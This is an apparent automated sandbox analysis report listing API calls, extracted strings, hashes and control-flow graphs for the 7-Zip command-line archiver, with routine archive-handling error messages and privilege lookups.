                                                                                                                                                                                                                                          • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
                                                                                                                                                                                                                                          • API String ID: 1252877886-1892825451
                                                                                                                                                                                                                                          • Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                          • Instruction ID: f26d39e30cc203cb5ff89fd17c5f0d4954d42b289d78a6d748ec6a6086689e2f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F65204773086C1A6DB2ECF29E1903EEBB61F395744F498016DB9907B22DB79D5A8C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                          • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                                          • API String ID: 1313864721-2333288578
                                                                                                                                                                                                                                          • Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                          • Instruction ID: d1550ff9da4b8b75a2aa84dbcbe74817868a6207b0c6e1c696d0435feb427160
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3115472204F44C6DA02DB22FE5437AB3AAFBD4785F950512EA8B43AA4CF3CD645C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0031AC84
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32 ref: 0031AC95
                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32 ref: 0031ACA9
                                                                                                                                                                                                                                          • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0031F928), ref: 0031ACE0
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0031F928), ref: 0031ACEA
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE ref: 0031ACFA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3398352648-0
                                                                                                                                                                                                                                          • Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                          • Instruction ID: f8205e13b2f7f1ee647ec1ecec29cecbe3159e4be9cc6664804b11e633e431cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60018062614E818BDB118F70FC8479A7365F784B86F544135EB4A83A64CF3CC689CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0031794C: FindClose.KERNELBASE ref: 0031795E
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE ref: 003179BA
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: free.MSVCRT ref: 003133D7
                                                                                                                                                                                                                                            • Part of subcall function 0031339C: memmove.MSVCRT(00000000,?,?,00000000,003110A8), ref: 003133F2
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE ref: 003179FA
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00317A08
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$FileFirstfree$Closememmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2921071498-0
                                                                                                                                                                                                                                          • Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                          • Instruction ID: b1fc3360b440096ecb456f62ada81098945e8c8ff8977e7a73358f88ca4f03cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25213E76208A808ACB26DF24E44039D6375F78A7B8F544720EAB9477D8DF38CA89C700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h3$Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
                                                                                                                                                                                                                                          • API String ID: 0-2163600657
                                                                                                                                                                                                                                          • Opcode ID: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                          • Instruction ID: 752931a26ceb2241e3a4f15d52cdad61c1e052825c45b86508281dc3285a9cc5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619308cd5c84a58143f6d60b4711cd903356f34d35ac1546f55c71045c053aa2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C503A132208A9096CA36EB25F4916EFB721F7CABC0F554112DB9E4BB25DF79C985C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1016 35950d-359510 1017 359516-359529 call 31ed74 1016->1017 1018 359a40-359a8e call 312130 1016->1018 1024 359820-359828 1017->1024 1025 35952f-359537 1017->1025 1028 359a90-359aa0 call 313314 1018->1028 1029 359aa2 1018->1029 1026 3599e4-3599ee 1024->1026 1027 35982e-35983f call 3578a8 1024->1027 1030 359557-3595d5 call 353230 call 313208 1025->1030 1031 359539-359541 1025->1031 1037 359a20-359a3f _CxxThrowException 1026->1037 1038 3599f0-359a1b call 312300 fputs * 2 call 312300 1026->1038 1045 359841-359845 1027->1045 1046 35984c-35994d call 356990 call 312bc8 call 337880 call 312bc8 call 312cdc call 356c04 1027->1046 1035 359aa5-359ac8 call 31b8f0 call 312130 1028->1035 1029->1035 1056 3595e5 1030->1056 1057 3595d7-3595df 1030->1057 1031->1030 1034 359543-359552 call 313518 1031->1034 1034->1030 1059 359adc 1035->1059 1060 359aca-359ada call 313314 1035->1060 1037->1018 1038->1037 1045->1046 1097 359980-3599df free * 5 call 356a20 1046->1097 1098 35994f 1046->1098 1062 3595e8-359631 call 313404 call 35780c 1056->1062 1057->1056 1061 3595e1-3595e3 1057->1061 1063 359adf-359c8b call 31b8f0 call 312130 1059->1063 1060->1063 1061->1062 1078 359633-359637 1062->1078 1079 35963e-35964d 1062->1079 1090 359c8d-359c98 call 357414 1063->1090 1091 359c9a 1063->1091 1078->1079 1082 359663 1079->1082 1083 35964f-359657 1079->1083 1087 35966b-35972c call 313404 call 356990 call 312bc8 1082->1087 1083->1082 1086 359659-359661 1083->1086 1086->1087 1117 35972f call 3499b8 1087->1117 1095 359c9d-359ca8 1090->1095 1091->1095 1100 359cb4-359d77 call 313404 1095->1100 1101 359caa-359cb3 1095->1101 1115 35a5ad-35a5b5 1097->1115 1104 359953-359969 1098->1104 1113 359d83-359e8a call 3571ec call 313404 call 31ef70 call 313208 call 336be0 1100->1113 1114 359d79-359d7d 1100->1114 1101->1100 1108 35997b-35997e 1104->1108 1109 35996b-359976 free * 2 1104->1109 1108->1097 1108->1104 1109->1108 1159 359ed2-359f44 call 335458 1113->1159 1160 359e8c-359eb4 call 336e08 1113->1160 1114->1113 1119 35a5c5-35a5c8 1115->1119 1120 35a5b7-35a5be 1115->1120 1122 359734-35973f 1117->1122 1123 35a5e7-35a603 free 1119->1123 1124 35a5ca-35a5e6 _CxxThrowException 1119->1124 1120->1119 1121 35a5c0 1120->1121 1126 35a5c0 call 3566a8 1121->1126 1127 359741-35974b call 35b1c8 1122->1127 1128 359750-359798 call 356c04 1122->1128 1129 35a605 1123->1129 1130 35a626-35a637 free call 33a13c 1123->1130 1124->1123 1126->1119 1127->1128 1140 3597cb-35981b free * 3 call 356a20 free call 35b310 1128->1140 1141 35979a 1128->1141 1134 35a609-35a624 free 1129->1134 1139 35a63c-35a675 call 357080 call 31182c call 357f50 1130->1139 1134->1130 1134->1134 1162 35a677 1139->1162 1163 35a6a8-35a6c9 free 1139->1163 1140->1115 1144 35979e-3597b4 1141->1144 1148 3597c6-3597c9 1144->1148 1149 3597b6-3597c1 free * 2 1144->1149 1148->1140 1148->1144 1149->1148 1168 359f49-359f53 1159->1168 1160->1159 1170 359eb6-359ed1 _CxxThrowException 1160->1170 1167 35a67b-35a691 1162->1167 1171 35a6a3-35a6a6 1167->1171 1172 35a693-35a69e free * 2 1167->1172 1173 359f55-359f5b call 35b1c8 1168->1173 1174 359f60-359f68 1168->1174 1170->1159 1171->1163 1171->1167 1172->1171 1173->1174 1176 359fbd-359fca 1174->1176 1177 359f6a-359f74 1174->1177 1178 35a02c-35a033 1176->1178 1179 359fcc-359fcf call 312300 1176->1179 1180 359f76-359fac call 312300 fputs call 312300 call 312320 call 312300 1177->1180 1181 359fb1-359fb9 1177->1181 1184 35a035-35a03a 1178->1184 1185 35a063-35a06a 1178->1185 1187 359fd4-359fdc 1179->1187 1180->1181 1181->1176 1184->1185 1186 35a03c-35a05e fputs call 3126a0 call 312300 1184->1186 1188 35a06c-35a071 1185->1188 1189 35a09e-35a0a1 1185->1189 1186->1185 1187->1178 1192 359fde-35a027 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1187->1192 1193 35a114-35a11b 1188->1193 1194 35a077-35a099 fputs call 3126a0 call 312300 1188->1194 1189->1193 1195 35a0a3-35a0aa 1189->1195 1192->1178 1200 35a11d-35a122 1193->1200 1201 35a15c-35a15f 1193->1201 1194->1189 1202 35a0d3-35a0da 1195->1202 1203 35a0ac-35a0ce fputs call 3126a0 call 312300 1195->1203 1206 35a161 1200->1206 1211 35a124-35a133 call 312300 1200->1211 1201->1206 1207 35a16c-35a16f 1201->1207 1202->1193 1205 35a0dc-35a0eb call 312300 1202->1205 1203->1202 1205->1193 1230 35a0ed-35a10f fputs call 3126a0 call 312300 1205->1230 1206->1207 1215 35a175-35a17c 1207->1215 1216 35a320-35a50a free * 2 call 336b58 free call 357968 1207->1216 1211->1206 1235 35a135-35a157 fputs call 3126a0 call 312300 1211->1235 1225 35a2e7-35a2f6 call 312300 1215->1225 1226 35a182-35a189 1215->1226 1267 35a53d-35a559 free 1216->1267 1268 35a50c 1216->1268 1225->1216 1247 35a2f8-35a31f fputs call 3126a0 call 312300 1225->1247 1226->1225 1232 35a18f-35a192 1226->1232 1230->1193 1232->1216 1238 35a198-35a1a3 1232->1238 1235->1201 1244 35a1d5-35a1de 1238->1244 1245 35a1a5-35a1cd fputs call 3126a0 call 312300 1238->1245 1252 35a1e0-35a1e3 1244->1252 1253 35a1f3-35a223 fputs call 3126a0 call 312300 1244->1253 1245->1244 1247->1216 1252->1253 1259 35a1e5-35a1ed 1252->1259 1260 35a275-35a2c3 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1253->1260 1277 35a225-35a270 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1253->1277 1259->1253 1259->1260 1291 35a2c8-35a2cb 1260->1291 1273 35a58c-35a599 free 1267->1273 1274 35a55b 1267->1274 1272 35a510-35a526 1268->1272 1278 35a538-35a53b 1272->1278 1279 35a528-35a533 free * 2 1272->1279 1273->1115 1280 35a55f-35a575 1274->1280 1277->1260 1278->1267 1278->1272 1279->1278 1283 35a587-35a58a 1280->1283 1284 35a577-35a582 free * 2 1280->1284 1283->1273 1283->1280 1284->1283 1291->1216 1293 35a2cd-35a2e5 call 312300 call 35291c 1291->1293 1293->1216
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$ExceptionThrowfputs$fputc
                                                                                                                                                                                                                                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                                                                                                                                                                                                                          • API String ID: 1639683984-435538426
                                                                                                                                                                                                                                          • Opcode ID: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                          • Instruction ID: 6407fefa87ea117db739ddcb17c8439c202fb7d85cb6b864cc973803cf4908d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd9f2b28495a3b62c3d481a4c9c43d8556660cff06a10aff3bafa4e3683c7a09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B72BF76309AC095CA36EF20E4807DFB3A4F78A781F404526DA9E47B29DF38C599CB41

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1833 359b5d-359b5f 1834 359b61-359b74 fputs call 312300 1833->1834 1835 359b79-359c1f call 35057c call 313208 call 3338e8 free 1833->1835 1834->1835 1843 359c21-359c2b call 35b1c8 1835->1843 1844 359c30-359c33 1835->1844 1843->1844 1846 359c35-359c3c 1844->1846 1847 359c54-359c8b call 35b310 call 312130 1844->1847 1846->1847 1848 359c3e-359c4e call 350994 1846->1848 1857 359c8d-359c98 call 357414 1847->1857 1858 359c9a 1847->1858 1852 359c53 1848->1852 1852->1847 1860 359c9d-359ca8 1857->1860 1858->1860 1862 359cb4-359d77 call 313404 1860->1862 1863 359caa-359cb3 1860->1863 1867 359d83-359e8a call 3571ec call 313404 call 31ef70 call 313208 call 336be0 1862->1867 1868 359d79-359d7d 1862->1868 1863->1862 1879 359ed2-359f53 call 335458 1867->1879 1880 359e8c-359eb4 call 336e08 1867->1880 1868->1867 1886 359f55-359f5b call 35b1c8 1879->1886 1887 359f60-359f68 1879->1887 1880->1879 1885 359eb6-359ed1 _CxxThrowException 1880->1885 1885->1879 1886->1887 1889 359fbd-359fca 1887->1889 1890 359f6a-359f74 1887->1890 1891 35a02c-35a033 1889->1891 1892 359fcc-359fcf call 312300 1889->1892 1893 359f76-359fac call 312300 fputs call 312300 call 312320 call 312300 1890->1893 1894 359fb1-359fb9 1890->1894 1897 35a035-35a03a 1891->1897 1898 35a063-35a06a 1891->1898 1900 359fd4-359fdc 1892->1900 1893->1894 1894->1889 1897->1898 1899 35a03c-35a05e fputs call 3126a0 call 312300 1897->1899 1901 35a06c-35a071 1898->1901 1902 35a09e-35a0a1 1898->1902 1899->1898 1900->1891 1905 359fde-35a027 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1900->1905 1906 35a114-35a11b 1901->1906 1907 35a077-35a099 fputs call 3126a0 call 312300 1901->1907 1902->1906 1908 35a0a3-35a0aa 1902->1908 1905->1891 1913 35a11d-35a122 1906->1913 1914 35a15c-35a15f 1906->1914 1907->1902 1915 35a0d3-35a0da 1908->1915 1916 35a0ac-35a0ce fputs call 3126a0 call 312300 1908->1916 1919 35a161 1913->1919 1924 35a124-35a133 call 312300 1913->1924 1914->1919 1920 35a16c-35a16f 1914->1920 1915->1906 1918 35a0dc-35a0eb call 312300 1915->1918 1916->1915 1918->1906 1943 35a0ed-35a10f fputs call 3126a0 call 312300 1918->1943 1919->1920 1928 35a175-35a17c 1920->1928 1929 35a320-35a50a free * 2 call 336b58 free call 357968 1920->1929 1924->1919 1948 35a135-35a157 fputs call 3126a0 call 312300 1924->1948 1938 35a2e7-35a2f6 call 312300 1928->1938 1939 35a182-35a189 1928->1939 1980 35a53d-35a559 free 1929->1980 1981 35a50c 1929->1981 1938->1929 1960 35a2f8-35a31f fputs call 3126a0 call 312300 1938->1960 1939->1938 1945 35a18f-35a192 1939->1945 1943->1906 1945->1929 1951 35a198-35a1a3 1945->1951 1948->1914 1957 35a1d5-35a1de 1951->1957 1958 35a1a5-35a1cd fputs call 3126a0 call 312300 1951->1958 1965 35a1e0-35a1e3 1957->1965 1966 35a1f3-35a223 fputs call 3126a0 call 312300 1957->1966 1958->1957 1960->1929 1965->1966 1972 35a1e5-35a1ed 1965->1972 1973 35a275-35a2c3 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1966->1973 1990 35a225-35a270 fputs call 3126a0 call 312300 fputs call 3126a0 call 312300 1966->1990 1972->1966 1972->1973 2015 35a2c8-35a2cb 1973->2015 1986 35a58c-35a5b5 free 1980->1986 1987 35a55b 1980->1987 1985 35a510-35a526 1981->1985 1991 35a538-35a53b 1985->1991 1992 35a528-35a533 free * 2 1985->1992 1999 35a5c5-35a5c8 1986->1999 2000 35a5b7-35a5be 1986->2000 1993 35a55f-35a575 1987->1993 1990->1973 1991->1980 1991->1985 1992->1991 1997 35a587-35a58a 1993->1997 1998 35a577-35a582 free * 2 1993->1998 1997->1986 1997->1993 1998->1997 2003 35a5e7-35a603 free 1999->2003 2004 35a5ca-35a5e6 _CxxThrowException 1999->2004 2000->1999 2001 35a5c0 call 3566a8 2000->2001 2001->1999 2008 35a605 2003->2008 2009 35a626-35a637 free call 33a13c 2003->2009 2004->2003 2012 35a609-35a624 free 2008->2012 2016 35a63c-35a675 call 357080 call 31182c call 357f50 2009->2016 2012->2009 2012->2012 2015->1929 2018 35a2cd-35a2e5 call 312300 call 35291c 2015->2018 2031 35a677 2016->2031 2032 35a6a8-35a6c9 free 2016->2032 2018->1929 2033 35a67b-35a691 2031->2033 2035 35a6a3-35a6a6 2033->2035 2036 35a693-35a69e free * 2 2033->2036 2035->2032 2035->2033 2036->2035
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputcfputsfree
                                                                                                                                                                                                                                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                                                                                                                                                                                                                          • API String ID: 2822829076-727241755
                                                                                                                                                                                                                                          • Opcode ID: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
                                                                                                                                                                                                                                          • Instruction ID: 84bd7ac170cec60254dea194349589c50ac58eec572b7a80bc250114a62f23b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6ea5868805d76338b3faf932c3aa06514698a3480bc4cc48a2eddf149bc62d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F228E36309AC195CA3AEF21E4907DEB3A0F789B81F444522DB9E47B29DF38C599C701

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2649 33a180-33a1e9 GetProcAddress * 2 2650 33a214-33a22a GetProcAddress 2649->2650 2651 33a1eb-33a1fe GetProcAddress 2649->2651 2652 33a233-33a23e 2650->2652 2654 33a22c-33a22e 2650->2654 2651->2652 2653 33a200-33a20d 2651->2653 2656 33a244-33a2f0 call 313208 call 338928 2652->2656 2657 33a729 2652->2657 2653->2652 2660 33a20f 2653->2660 2655 33a72b-33a73e 2654->2655 2664 33a2f6-33a30a 2656->2664 2665 33a648 2656->2665 2657->2655 2660->2655 2667 33a31c-33a321 2664->2667 2668 33a30c-33a31a 2664->2668 2666 33a718-33a727 call 3394a8 2665->2666 2666->2655 2671 33a328-33a32b 2667->2671 2668->2671 2673 33a34a-33a350 2671->2673 2674 33a32d-33a345 call 31ae2c call 3394a8 2671->2674 2676 33a352-33a36a call 31ae2c call 3394a8 2673->2676 2677 33a36f-33a37d SysStringByteLen 2673->2677 2691 33a634-33a63d 2674->2691 2676->2691 2678 33a383-33a3e3 call 31ae2c * 2 call 313208 * 2 call 338928 2677->2678 2679 33a64d-33a65d call 31ae2c 2677->2679 2701 33a662-33a678 free * 2 2678->2701 2702 33a3e9-33a40c call 338928 2678->2702 2679->2666 2691->2656 2694 33a643 2691->2694 2694->2657 2701->2666 2705 33a412-33a485 call 339d98 call 3387a8 call 338860 2702->2705 2706 33a67d-33a693 free * 2 2702->2706 2713 33a48b-33a49c 2705->2713 2714 33a698-33a6ae free * 2 2705->2714 2706->2666 2715 33a4ee-33a51b call 339380 2713->2715 2716 33a49e-33a4a5 2713->2716 2714->2666 2721 33a521-33a526 2715->2721 2722 33a6b0-33a6d1 free * 3 2715->2722 2717 33a4ab-33a4d9 call 3387a8 2716->2717 2726 33a4e5-33a4ec 2717->2726 2727 33a4db-33a4de 2717->2727 2724 33a541-33a564 call 339380 2721->2724 2725 33a528-33a53f call 3398d4 2721->2725 2722->2666 2733 33a6d3-33a6f4 free * 3 2724->2733 2734 33a56a-33a57e call 33a034 2724->2734 2732 33a583-33a5b7 call 338860 2725->2732 2726->2715 2726->2717 2727->2726 2738 33a6f6-33a715 free * 3 2732->2738 2739 33a5bd-33a5c0 2732->2739 2733->2666 2734->2732 2738->2666 2740 33a5c2-33a5ca 2739->2740 2741 33a5cf-33a5e4 call 312130 2739->2741 2740->2741 2744 33a5e6-33a5f1 call 339af0 2741->2744 2745 33a5f8 2741->2745 2748 33a5f6 2744->2748 2747 33a5fb-33a62f call 31b8f0 free * 3 call 3394a8 2745->2747 2747->2691 2748->2747
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                                          • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                                                          • API String ID: 190572456-3984264347
                                                                                                                                                                                                                                          • Opcode ID: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                          • Instruction ID: a9cb1d5832fb5ae535e8d364b1be25fe19ac92eb5c93927c015a11aa452479df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73fef0eb24d6ff44d8697e840df78f3fac1608cd30a242a31fa2bdb042e46f71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0D15372319AC096C622EB21E88179FB7A4F7CA780F445521EACE4BB69DF7CC545CB01

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
